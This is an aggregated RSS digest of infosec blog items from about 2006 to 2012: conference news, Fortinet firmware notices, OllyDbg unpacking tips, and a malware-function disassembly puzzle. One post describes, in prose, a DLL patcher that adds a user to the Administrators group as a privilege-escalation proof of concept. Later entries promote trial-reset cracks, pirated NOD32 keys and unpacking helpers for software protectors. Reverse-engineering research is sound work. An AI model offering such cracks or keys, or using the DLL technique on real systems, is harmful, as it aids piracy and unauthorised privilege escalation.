http://infosecevents.net/feed/ Event Related Derbycon 2012 Videos – irongeek.com Hope you enjoyed the con! Here are the videos from Derbycon 2012. We had a few recording SNAFUs, but all in all it went very well. For the descriptions of the talks click a talk link below or go to the Derbycon page. Feel free to link or [...]

==> Week 39 in Review – 2012

http://infosecevents.net/feed/ Event Related Snoopy: A distributed tracking and profiling framework – sensepost.com At this year’s 44Con conference (held in London) Daniel and I introduced a project we had been working on for the past few months. Snoopy, a distributed tracking and profiling framework, allowed us to perform some pretty interesting tracking and profiling of mobile users [...]

==> Information Security Events For October

http://infosecevents.net/feed/ Here are information security events in North America this month: SecTor : October 1 to 3 in Toronto Canada WACCI 2012 : October 9 to 12 in Brookfield, WI USA HouSecCon 2012 : October 10 to 11 in Houston, TX USA SC World Congress 2012 : October 11 in New [...]

==> Week 38 in Review – 2012

http://infosecevents.net/feed/ Event Related Columbus OWASP Meeting Presentation – stateofsecurity.com Last week, I presented at the Columbus OWASP meeting on defensive fuzzing, tampering with production web applications as a defensive tactic and some of the other odd stuff we have done in that arena. Charlie Miller & Dino Dai Zovi at CodenomiCON 2012: iOS Hacker’s Update – [...]

==> Week 37 in Review – 2012

http://infosecevents.net/feed/ Event Related Man on the SecurityStreet Man on the SecurityStreet – Day 2 Continued. – community.rapid7.com Dave Kennedy, the founder of TrustedSec, gave an entertaining presentation called Going on the Offensive – Proactive Measures in Security your Company. Just like HD’s earlier presentation, we had our staff artist plot out the entire speech, which you [...]

==> Week 36 in Review – 2012

http://infosecevents.net/feed/ Resources Elderwood Project ‘Elderwood’ Crew, Tied to Google Aurora Attack, Targeting Defense, Energy, Finance Companies – threatpost.com The same team that attacked Google in the Aurora campaign in 2009 is still active and has been conducting a long-term campaign targeting defense contractors, financial services companies, energy companies, human rights organizations and government agencies using a [...]

==> Week 35 in Review – 2012

http://infosecevents.net/feed/ Event Related OWASP DCs Videos – vimeo.com Here are all of the videos that OWASP DC has uploaded to Vimeo. Appearances are videos that OWASP DC has been credited in by others. Stripe CTF 2 Web Challenges – abiusx.com I participated in the Stripe CTF Web Attacks and thus far it was the most [...]

==> Information Security Events For September

http://infosecevents.net/feed/ Here are information security events in North America this month: BSides St John’s : September 21 in St John’s USA VB2012 : September 26 to 28 in Dallas, TX USA DerbyCon 2012 : September 27 to 30 in Louisville, Kentucky USA GrrCON 2012 : September 27 to 28 in [...]

==> Week 34 in Review – 2012

http://infosecevents.net/feed/ Event Related BsidesLA Slides/Code – atenlabs.com So I whipped a talk recently to give at BSidesLA about how to stack tools voltron-style together and get some pretty gnarly successes. Here are some light talking points to give you an idea of what the subject matter was, but I should let the slides do most of [...]

==> The blog has moved…

http://infosecramblings.wordpress.com/feed/ After much thought and consideration, I decided to move my blog from wordpress.com to my own domain. The decision has nothing to do with the service provided by wordpress.com. I have never had any problems with this blog while it has been hosted by wordpress.com. There are other things I want to do with the [...]

==> Interesting Information Security Bits for 11/07/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. Virtualization: How to Isolate Application Traffic Lori has penned a nice article pointing out how we can use VLANs to isolate application traffic. She makes and excellent point in the article, “we’ve grown to [...]

==> Interesting Information Security Bits for 11/06/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. TaoSecurity: Defining Security Event Correlation Richard has a good post up on defining security event correlation. Go check it out. Why use Firefox << Techdulla Techdulla tells us why he uses Firefox for his [...]

==> Interesting Information Security Bits for 11/05/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. CSI Stick – So who has a copy of your phone? << SANS Computer Forensics, Investigation, and Response This is both very cool and very scary. Tool that allows you to quickly and easily [...]

==> Interesting Information Security Bits for 11/04/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. /dev/random >> Blog Archive >> Critical dns2tcp Vulnerability! Looks like dns2tcp has a vulnerability that needs to be taken care of. Time to upgrade. TrueCrypt – Free Open-Source On-The-Fly Disk Encryption Software for Windows [...]

==> Resources to increase your info security knowledge and benefit your infosec career…

http://infosecramblings.wordpress.com/feed/ @GeekGrrl posted a note on her blog asking this question: 1) How would you recommend getting started on a career toward Network Security/Network Pen Tester? She has some follow-up questions to that first one requesting some specific information. Go read her post and then come back. . . . . Okay, here is what I [...]

==> Who needs employee exit procedures and disaster recovery plans are for whimps…

http://infosecramblings.wordpress.com/feed/ This article talks about the conviction of Pryavrat Patel for actions he took after his long-term contract employment with Pratt-Read was terminated. Now, what Mr. Patel did was definitely wrong, but frankly, Pratt-Read should probably put some thought into how they dealt with the situation too. It took them two weeks to recover from the [...]

==> Recap: RSA Europe 2008 Day 2

http://infosecramblings.wordpress.com/feed/ Hello again. Day 2 of RSA Europe 2008 was a busy one. I attended several sessions during the day and then the Security Catalyst, Security Bloggers, Security Twits get together happened that evening. This post will only talk about the day. The meet-up post will be later. Without further ado, let’s get to it. ‘The [...]

==> Recap: RSA Europe 2008 Day 1

http://infosecramblings.wordpress.com/feed/ Hi there folks. I am home and somewhat rested from my trip to London for the RSA Europe 2008 conference. It was a great trip and i enjoyed the conference. Below is a recap of my first day. This is going to be long, so hang in there Information Security: From Ineffective to Innovative Arthur [...]

==> Elevation of Privilege DLL Patcher

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx In the course of security consulting, I often find myself in a situation where I've identified a security vulnerability but I need to create a proof-of-concept to show the feasibility of the vulnerability's exploitability. Recently, I found an elevation-of-privilege vulnerability in which an application that runs as a privileged user loads a DLL from a location that is writeable by an unprivileged attacker. An unprivileged attacker could write a malicious DLL to this location, and when loaded by the given application, the DLL's code would execute in the context of a privileged user. Ideally, we'd like the "malicious" DLL to have all the functionality of the DLL that the application expected to load, including the same exported functions. In other words, what I really wanted was an easy way to patch an existing DLL to inject my "malicious" code to run before the DLL's original DllMain code was executed, after which the original DllMain code would be called and the DLL would continue to operate as normal. Unfortunately, I know of no programs like this that patch DLLs on disk, so I made my own. The program attached to this blog post redirects a given DLL's entrypoint (which originally pointed to DllMain) to point to code that has been patched in to the DLL. This patched in code will add a given user to the Administrators group in Windows (assuming that it's being run in the context of a privileged user), after which it will transfer control back to the DLL's original DllMain. The patcher also updates the Import Table for the DLL since the patched in code relies on the function NetLocalGroupAddMembers(...) from netapi32.dll. The only other side effect of the patcher is that it clears the Bound Imports for the DLL; the only adverse side effect of this is that this may cause the DLL to take a few extra milliseconds to load. The patcher is compatible with both 32-bit and 64-bit DLLs. You can run the patcher executable without command line arguments for usage instructions. This is version 1.0, so please e-mail me if you

==> Counting Lines of Source Code

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I'm reviewing the source code for a rather large project this week and I wanted to update my Facebook status by saying something like, "Jason is reviewing 100,000 lines of Java for security vulnerabilities." However, being the perfectionist that I am I wanted to give the real number of lines of code. I wasn't aware of any built-in functionality in Visual Studio to do this, and after three minutes of Googling, I found a lot of Visual Studio plugins that could do this but unfortunately I didn't find any instructions on how to do this with just plain Visual Studio. And honestly, I didn't want to install a plugin (see http://blogs.msdn.com/oldnewthing/archive/2006/03/22/558007.aspx :) I figured I could whip up a short C# program to do this, but even that seemed a little over-kill for such a simple task. Then I realized I could do this from a standard console window command prompt: cmd /v:on set lines = 0 for /r %a in (*.java) do (find /v /c "" "%a" > %temp%\temp.txt for /f "tokens=6" %b in (%temp%\temp.txt) do (set /a lines += %b)) echo %lines% The "tokens=6" part is specific to the source code directory structure for this particular project, and if any of the source code subdirectories contained spaces, you'd have to tweak the code above a little. But hey, it worked out quite nicely, and it was a much cleaner solution than installing a plugin. And I'm sure there's an even shorter/simpler way to do this from a standard command prompt than with what I have above. Feel free to post cleaner "solutions" :) (BTW, the actual number of lines turned out to be 348,523... that should keep me busy for a while.)

==> Investigating Outlook's Single-Instance Restriction (PART 2)

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx Please see PART 1. While the return value of FindWindowA is used to determine whether or not Outlook terminates its process, there's another issues when it comes to using a separate profile. Outlook calls MAPILogonEx without the MAPI_NEW_SESSION bit set. This causes Outlook to try to use an existing MAPI session if it can find one. Because of this, Outlook doesn't present the user with the option to choose a different profile in the second instance of Outlook; it will instead just use the profile that the first instance is using. (Why I didn't hit this issue in PART 1 is not clear.) As such, to fully overcome Outlook's single-instance limitation, it is necessary to spoof the return value of the FindWindowA call in PART 1 and to set the MAPI_NEW_SESSION bit in the flFlags argument passed to MAPILogonEx.

==> Loading Drivers in OllyDbg

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx In a previous post, I talked about changing the Subsystem field in the IMAGE_OPTIONAL_HEADER to trick OllyDbg into loading a driver for the purpose of unpacking. However, making this single change is often not enough to be able to load the driver as an EXE in OllyDbg. From my experience (in other words, I haven't verified this in the Windows source code and I'm not speaking authoritatively here), executable files need to have NTDLL.DLL in their Import Table or have another DLL in their Import Table that will eventually cause NTDLL.DLL to get loaded. I was looking at a driver today that only had NTOSKRNL.EXE and HAL.DLL in its Import Table. The former causes BOOTVID.DLL and KDCOM.DLL to get loaded as well, however nowhere in the import chain does NTDLL.DLL get loaded. Because of this, OllyDbg can't get the driver up and running after we make the Subsystem change. To solve this problem, we can add NTDLL.DLL (or anything that imports NTDLL.DLL, like KERNEL32.DLL) to the Import Table of the driver and OllyDbg will then be able to load the driver as a new process.

==> Function Analysis

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx While analyzing a malware sample today, I came across an interesting function. It uses red-herring local variables and red-herring global variables, and even once you get rid of that code, it's still unclear as to what the function does. Since you don't have access to the callers of this function, I'll tell you this: * The first argument is a null-terminated ASCII string. * The second argument is a null-terminated ASCII string. * The third argument is an integer. Your challenge? Tell me what the function does. Your prize? You get to choose the name of the next malware family that I name. Stipulations: * Cannot refer to the name of a person, place, or time. * Cannot refer to anything obscene or offensive. * Cannot be found in a dictionary or web-search. * Cannot use bleep-casing for compounding words -- must begin with one uppercase letter and end with all lowercase letters. * Must be a "generic" name (for example, shouldn't contain the word "bot" or "worm", since I have no idea what class of malware I'll end up naming next). * Must be humanly pronouncable. * Must be between four and eight letters in length. * I have final discretion over the name in case you think of something "bad" that isn't covered by one of the rules above. The winner is the first person to post a comment that correctly and fully describes in high-level English (not in code) what the function does. And to in case you think I'm "hiring cheap labor" to analyze this for me, I'll pull a Raymond Chen and say that the MD5 of my analysis is F2F3648B9BE371B4682B728A7A3D920F. Once the correct answer is posted, I'll post my analysis which hashes to that MD5. Here's the function: sub_0 proc near var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 10h push ebx push esi push edi mov esi, [ebp+ arg_4 ] mov [ebp+ var_8 ], 697A259Dh xor [ebp+ var_8 ], 182Ch inc dword ptr ds: 42C094h and [ebp+ var_C ], 0 and [ebp+ var_4 ], 0 jmp short loc_94 ; ----------------------------------------------------------------------- loc_2A: ; CODE XREF: sub_0+A6j xor ebx, ebx add [ebp+ var_8 ], 3AA5h inc dword ptr ds: 42C094h xor edi, edi jmp short loc_81 ; ----------------------------------------------------------------------- loc_3D: ; CODE XREF: sub_0+8Fj mov eax, [ebp+ var_4 ] add eax, edi mov edx, [ebp+ arg_0 ] movsx eax, byte ptr [edx+eax] movsx edx, byte ptr [esi+edi] cmp eax, edx jnz short loc_52 inc ebx loc_52: ; CODE XREF: sub_0+4Fj mov ecx, esi or eax, 0FFFFFFFFh loc_57: ; CODE XREF: sub_0+5Cj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_57 cmp ebx, eax jnz short loc_72 inc [ebp+ var_C ] mov eax, [ebp+ arg_8 ] cmp [ebp+ var_C ], eax jnz short loc_72 mov eax, [ebp+ var_4 ] jmp short loc_C0 ; ----------------------------------------------------------------------- loc_72: ; CODE XREF: sub_0+60j ; sub_0+6Bj mov eax, 43C9h mul [ebp+ var_8 ] mov [ebp+ var_10 ], eax mov [ebp+ var_8 ], eax inc edi loc_81: ; CODE XREF: sub_0+3Bj mov ecx, esi or eax, 0FFFFFFFFh loc_86: ; CODE XREF: sub_0+8Bj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_86 cmp edi, eax jb short loc_3D inc [ebp+ var_4 ] loc_94: ; CODE XREF: sub_0+28j mov eax, [ebp+ arg_0 ] mov ecx, eax or eax, 0FFFFFFFFh loc_9C: ; CODE XREF: sub_0+A1j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_9C cmp [ebp+ var_4 ], eax jb short loc_2A mov eax, 0FFFFh jmp short loc_C0 ; ----------------------------------------------------------------------- mov eax, 514Ah mul dword ptr [ebp- 8 ] mov [ebp- 10h ], eax mov eax, [ebp- 10h ] mov [ebp- 8 ], eax loc_C0: ; CODE XREF: sub_0+70j ; sub_0+ADj pop edi pop esi pop ebx leave retn sub_0 endp And here's the raw byte-code for the function above: 5589E583EC105356578B750CC745F89D257A698175F82C180000FF0594C04200 8365F4008365FC00EB6A31DB8145F8A53A0000FF0594C0420031FFEB448B45FC 01F88B55080FBE04020FBE143E39D075014389F183C8FF40803C010075F939C3 7510FF45F48B45103945F475058B45FCEB4EB8C9430000F765F88945F08945F8 4789F183C8FF40803C010075F939C772ACFF45FC8B450889C183C8FF40803C01 0075F93945FC7282B8FFFF0000EB11B84A510000F765F88945F08B45F08945F8 5F5E5BC9C3

==> Virus Bulletin 2006

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I bought my plane ticket a few hours ago for Virus Bulletin 2006. I'm looking forward to rubbing elbows with other virus analysts and discussing the latest and greatest reverse engineering tools and methods. If you're going to VB'06 as well, send me an e-mail or find me in person and mention my blog and I'll buy you a beer (which shouldn't be too hard seeing as how the conference will be in Montreal)!

==> Unpacking DLLs and Drivers with OllyDbg

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx People often ask me how to unpack DLLs and drivers. A common assumption is that it is necessary to use OllyDbg's LOADDLL for unpacking DLLs and that a ring-0 debugger such as SoftICE or WinDbg is necessary for unpacking drivers. With a little tweaking, we can use regular OllyDbg to unpack packed DLLs and even many packed drivers. I don't know about you, but I've always had problems with LOADDLL. Even though it's well documented in OllyDbg's help file (the source is even included in the help file), I'd rather not use it if I don't have to. So how can we load a DLL into OllyDbg so that we can unpack it like we would a normal EXE? All that you need to do is set the IMAGE_FILE_DLL bit to zero in the Characteristics field of the PE's IMAGE_FILE_HEADER structure. You could use a hex editor to make this change, but it's easier with a PE editor like LordPE. Once this flag is zeroed out, you can load the "DLL" into OllyDbg and OllyDbg and the OS will interpret it as an EXE. You can then unpack it as you would an EXE (trace to the OEP, dump, fix the imports, etc.), and then set the IMAGE_FILE_DLL bit back to one in the unpacked file. The only catch is that many unpacking stubs check to see if [EBP+0x0C] == 1 (does the fdwReason argument to DllMain equal DLL_PROCESS_ATTACH), and if it doesn't equal 1 then it won't continue to unpack itself. You can fix this problem by looking for this comparison and forcing a jump/no-jump or by manually pushing three DWORDs onto the stack (before executing the first instruction at the EP), the second of which should be 1. We can use the same PE header patching trick for loading drivers into OllyDbg for unpacking purposes. By setting the Subsystem field to 2 (IMAGE_SUBSYSTEM_WINDOWS_GUI) in the PE's IMAGE_OPTIONAL_HEADER, OllyDbg and the OS will interpret the file as an EXE instead of as a driver. This allows us to trace through the unpacking stub until the code and data are unpacked, and we can dump the process when we find the OEP. Of course if the unpacking stub is trying to execute instructions/functions that need to be executed from ring-0 then we won't be able to unpack it like this. However, if the unpacking stub is just doing a lot of simple XORing to unpack the original code and data, then we should be able to use this trick to successfully unpack the driver with OllyDbg.

==> FortiDDoS 3.1.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiDDoS 3.1.2 B4 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FDD_100A, FDD_200A, FDD_300A,

==> FortiVoice 7.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.2.0 B004 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_40, FVC_70, FVC_100,

==> FortiClient 4.3.5

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient 4.3.5 B472 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Windows_x86, Windows_x64

==> FortiMail 4.3.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiMail 4.3.3 B0520 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FE_100, FE_100C, FE_400, * FE_400B, FE_400C, FE_2000, * FE_2000A, FE_2000B, FE_3000C, * FE_3000C_LENC, FE_4000, FE_5001A, * FE_5002B, FE_VM, FE_200D,

==> FortiWeb 4.4.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 4.4.3 B0657 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FWB_400B, FWB_400C, FWB_1000B, * FWB_1000C, FWB_3000C, FWB_3000CFSX, * FWB_4000C, FWB_VM-64bit

==> FortiClient Android 4.1.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Android 4.1.1 B0019 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Android

==> FortiOS 4.3.10

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.3.10 B0639 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_800, FGT_3600, FGT_300A, * FGT_100A, FGT_200A, FGT_400A, * FGT_500A, FGT_800F, FGT_5001FA2, * FGT_1000A, FGT_5001, FGT_5005, * FGT_3810A, FGT_50B, FWF_50B, * FGT_3016B, FGT_310B, FGT_30B, * FGT_5005FA2, FGT_224B, FWF_60B, * FGT_60B, FGT_1000AFA2, FGT_1000A_LENC, * FGT_3600A, FGT_5002FB2, FGT_5001A, * FGT_620B, FOC_5001, FOC_5005FA2, * FOC_3810A, FGT_110C, FOC_WF_60B, * FGT_111C, FGT_51B, FGT_80C, * FWF_80CM, FGT_311B, FWF_30B, * FGT_82C, FWF_81CM, FGT_ONE, * FGT_1240B, FGT_3950B, FGT_3951B, * FOC_60B, FOC_5001A, FOC_5001FA2, * FGT_80CM, FGT_200B, FGT_200B_POE, * FGT_310B_DC, FGT_620B_DC, FOC_3950B, * FOC_3951B, FGT_3040B, FGT_621B, * FGT_3140B, FGT_5001B, FGT_60C, * FGT_VM32, FK_3810A, FK_5001A, * FK_3950B, FK_3951B, FSW_5203B, * FWF_60CX_A, FWF_60CM, FGT_300C, * FOC_80C, FOC_5001B, FK_5001B, * FGT_VM64, FGT_600C, FGT_1000C, * FGT_40C, FGT_20C, FWF_20C, * FGT_100D, FGT_5101C, FGT_3140B_LENC, * FGT_3140B_DC, FGT_3040B_LENC, FGT_3040B_DC, * FGT_800C

==> FortiWeb 4.4.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 4.4.2 B0651 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FWB_400B, FWB_400C, FWB_1000B, * FWB_1000C, FWB_3000C, FWB_3000CFSX, * FWB_4000C, FWB_VM-64bit

==> FortiOS 4.2.13

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.2.13 B0349 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_30B, FK_3810A, FK_5001A, * FGT_50B, FGT_51B, FGT_60B, * FGT_80C, FGT_80CM, FGT_82C, * FGT_100A, FGT_200A, FGT_110C, * FGT_111C, FGT_200B, FGT_224B, * FGT_300A, FGT_310B, FGT_310B_DC, * FGT_311B, FGT_400A, FGT_500A, * FGT_620B, FGT_620B_DC, FGT_800, * FGT_800F, FGT_1000A, FGT_1000AFA2, * FGT_1000A_LENC, FGT_3016B, FGT_3600A, * FGT_3810A, FGT_5001, FGT_5001A, * FGT_5001FA2, FGT_5005FA2, FOC_3810A, * FOC_5001, FOC_5001A, FOC_5001FA2, * FOC_5005FA2, FWF_30B, FWF_50B, * FWF_60B, FWF_80CM, FWF_81CM, * FGT_1240B, FGT_3600, FGT_200B_POE, * FGT_ONE, FGT_60C, FGT_3950B, * FGT_3951B, FGT_3040B, FGT_621B, * FK_3950B, FK_3951B, FWF_60C, * FGT_VM, FGT_621B_DC, FGT_5001B, * FGT_3140B, FWF_60CM, FK_5001B, * FWF_60CX_A, FGT_3950B_LENC, FGT_300C,

==> FortiSwitch 4.3.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiSwitch 4.3.3 B0135 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FS_5003B, FS_5003A

==> FortiVoiceOS 2.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoiceOS 2.0.0 B0086 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_200D

==> FortiClient Android 4.1.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Android 4.1.0 B0016 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Android

==> FortiAP 4.3.9

http://pub.kb.fortinet.com/rss/firmware.xml FortiAP 4.3.9 B0228 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAP_210B, FAP_220A, FAP_220B, * FAP_222B, FAP_221B

==> FortiOS 4.3.9

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.3.9 B0637 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_800, FGT_3600, FGT_300A, * FGT_100A, FGT_200A, FGT_400A, * FGT_500A, FGT_800F, FGT_5001FA2, * FGT_1000A, FGT_5001, FGT_5005, * FGT_3810A, FGT_50B, FWF_50B, * FGT_3016B, FGT_310B, FGT_30B, * FGT_5005FA2, FGT_224B, FWF_60B, * FGT_60B, FGT_1000AFA2, FGT_1000A_LENC, * FGT_3600A, FGT_5002FB2, FGT_5001A, * FGT_620B, FOC_5001, FOC_5005FA2, * FOC_3810A, FGT_110C, FOC_WF_60B, * FGT_111C, FGT_51B, FGT_80C, * FWF_80CM, FGT_311B, FWF_30B, * FGT_82C, FWF_81CM, FGT_ONE, * FGT_1240B, FGT_3950B, FGT_3951B, * FOC_60B, FOC_5001A, FOC_5001FA2, * FGT_80CM, FGT_200B, FGT_200B_POE, * FGT_310B_DC, FGT_620B_DC, FWF_60C, * FOC_3950B, FOC_3951B, FGT_3040B, * FGT_621B, FGT_3140B, FGT_5001B, * FGT_60C, FGT_VM32, FK_3810A, * FK_5001A, FK_3950B, FK_3951B, * FSW_5203B, FWF_60CX_A, FWF_60CM, * FGT_300C, FOC_80C, FOC_5001B, * FK_5001B, FGT_VM64, FGT_600C, * FGT_1000C, FGT_40C, FWF_40C, * FGT_20C, FWF_20C, FGT_VM64_XEN, * FGT_100D, FGT_5101C, FGT_3140B_LENC, * FGT_3140B_DC, FGT_3040B_LENC, FGT_3040B_DC, * FGT_800C

==> FortiCache 2.1.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiCache 2.1.2 B0173 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FCH1KC, FCH3KC, FCH4HC,

==> FortiVoice 7.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.2.0 B002 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_40, FVC_70, FVC_100,

==> FortiClient Android 4.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Android 4.0.1 B0010 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Android

==> FortiClient iOS 2.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient iOS 2.0.1 B117 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * iOS

==> FortiWeb 4.4.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 4.4.1 B0644 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FWB_400B, FWB_400C, FWB_1000B, * FWB_1000C, FWB_3000C, FWB_3000CFSX, * FWB_4000C, FWB_VM-64bit

==> FortiAnalyzer 4.3.5

http://pub.kb.fortinet.com/rss/firmware.xml FortiAnalyzer 4.3.5 B0680 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FLG_100B, FLG_100C, FLG_400B, * FLG_800, FLG_800B, FLG_1000B, * FLG_1000C, FLG_2000, FLG_2000A, * FLG_2000B, FLG_4000, FLG_4000A, * FLG_4000B, FLG_VM32, FLG_400C, * FLG_VM64

==> Toggl time-tracking service failures

http://rdist.root.org/feed/ A while ago, we investigated using various time-tracking services. Making this quick and easy for employees is helpful in a consulting company. Our experience with one service should serve as a cautionary note for web 2.0 companies that want to sell to businesses. Time tracking is a service that seems both boring and easy to [...]

==> Cyber-weapon authors catch up on blog reading

http://rdist.root.org/feed/ One of the more popular posts on this blog was the one pointing out how Stuxnet was unsophisticated. Its use of traditional malware methods and lack of protection for the payload indicated that the authors were either “Team B” or in a big hurry. The post was intended to counteract the breathless praise in the [...]

==> RSA repeats earlier claims, but louder

http://rdist.root.org/feed/ Sam Curry of RSA was nice enough to respond to my post. Here’s a few points that jumped out at me from what he wrote: RSA is in the process of fixing the downgrade attack that allows an attacker to choose PKCS #1 v1.5, even if the key was generated by a user who selected [...]

==> Why RSA is misleading about SecurID vulnerability

http://rdist.root.org/feed/ There’s an extensive rebuttal RSA wrote in response to a paper showing that their SecurID 800 token has a crypto vulnerability. It’s interesting how RSA’s response walks around the research without directly addressing it. A perfectly accurate (but inflammatory) headline could also have been “RSA’s RSA Implementation Contained Security Flaw Known Since 1998“. The research [...]

==> SSL optimization and security talk

http://rdist.root.org/feed/ I gave a talk at Cal Poly on recently proposed changes to SSL. I covered False Start and Snap Start, both designed by Google engineer Adam Langley. Snap Start has been withdrawn, but there are some interesting design tradeoffs in these proposals that merit attention. False Start provides a minor improvement over stock SSL, which [...]

==> Why stream ciphers shouldn’t be used for hashing

http://rdist.root.org/feed/ I recently saw a blog post that discussed using RC4 as an ad-hoc hash in order to show why CBC mode is better than ECB. While the author’s example is merely an attempt to create a graphic, it reminded me to explain why a stream cipher shouldn’t be used as as a cryptographic hash. A [...]

==> OllyDbg 2.00.01 (Final)

http://reversengineering.wordpress.com/feed/ OllyDbg 2.0 is a 32-bit assembler-level analyzing Degugger with intuitive interface. It is especially useful if source code is not available or when you experience problems with your compiler. Requirements. Developed and tested mainly under Windows 2000 and Windows XP, but should work under any Windows version: 95, 98, ME, NT, 2000, XP, 2003 Server, [...]

==> PROTECTiON iD 6.4.0

http://reversengineering.wordpress.com/feed/ Features: - detection of every major PC ISO Game / Application protection - currently covers 475 detections, including win32/64 exe protectors & packers, .net protectors, dongles, licenses & installers - sector scanning CDs / DVDs for Copy Protections - files / folders can simply be drag & droped into pid - strong scanning routines allowing [...]

==> StrongOD 0.3.4.639

http://reversengineering.wordpress.com/feed/ Make your OllyDbg Strong! This plug-in provides three kinds of ways to initiate the process: 1, Normal – And the same manner as the original start, the STARTUPINFO inside unclean data 2, CreateAsUser – User with a mandate to initiate the process of the user, so that the process running under the purview of the [...]

==> Broken links ! لینکهایی که کار نمی کند

http://reversengineering.wordpress.com/feed/ hi dear friends tell me about broken links in this post i will find it on my system and after that i will try [...]

==> Trial Reset 4 Final

http://reversengineering.wordpress.com/feed/ Trial Reset 4 Final Tnx fly to his programmer http://rapidshare.com/files/409095074/Trial-Reset40Final.zip http://reversengineering.files.wordpress.com/2010/07/trial-reset40final-zip.jpg you know what to do;) Filed under: OTHER, TOOLS

==> The newest NOD32 keys with MVGM NOD32 Licence v1.0

http://reversengineering.wordpress.com/feed/ HI The newest NOD32 keys with MVGM NOD32 Licence v1.0 NOD32 [...]

==> TrialReset 4.0 Final (Public)

http://reversengineering.wordpress.com/feed/ hi to all i am here again thank u for ur supporting The small program for remove trial of apps. Works with all the widespread systems of protection. The interface is very simple: [...]

==> ODDragAttach 1.1

http://reversengineering.wordpress.com/feed/ Author Exile Description Choice is, it will add the window corresponding to the process of src and bin. Window, the process of selection, OD automatically minimize the window, select the target window, then maximize the window, OD. Note: Some versions of the OD program may cover an open button, can be changed according [...]

==> Attach Extended 0.1

http://reversengineering.wordpress.com/feed/ This is a really small plugin that I have written for improving attach feature of OllyDbg. With this plugin, you can attach to process by identifying its PID directly, not only selecting process list. In addition, you can find PID of process by dragging a small cursor on each window (This can be used on [...]

==> Mapimp 0.4

http://reversengineering.wordpress.com/feed/ Author takerZ Description This is an open source OllyDbg plugin which will help you to import map files exported by IDA or Dede. There are many plugins using which you can perform similar actions, but mapimp: - Recognizes debugged file segments and applies names correctly - Has an option to overwrite or skip [...]

==> Obsidium 1.4.x.x OEP Finder + IAT Repair v0.1

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/7203.a79ca10d2342f1b32333add72/Obsidium_1.4.x.x_OEP_Finder___IAT_Repair_v0.1.txt.html Author Pavka Posted in Scripts, TOOLS

==> MUltimate Assembler 1.2

http://reversengineering.wordpress.com/feed/ Author RaMMicHaeL A multi-line (dis)assembler tool, perfect for writing code caves. It supports: - labels and data (C-style string) - external jumps and calls. http://letitbit.net/download/6671.c63ed09074b57c49b4cd2067e/MUltimate_Assembler_v1.2.rar.html Posted in OLLY'S PLUGINS, TOOLS

==> VMProtect 1.7 – 1.8 OEP Finder + Unpack Helper v1.0

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/2516.25addf1167522eb8602b67146/VMProtect_1.7___1.8_OEP_Finder___Unpack_Helper_v1.0.txt.html by LCF-AT Posted in Scripts, TOOLS

==> CodeDoctor 0.90

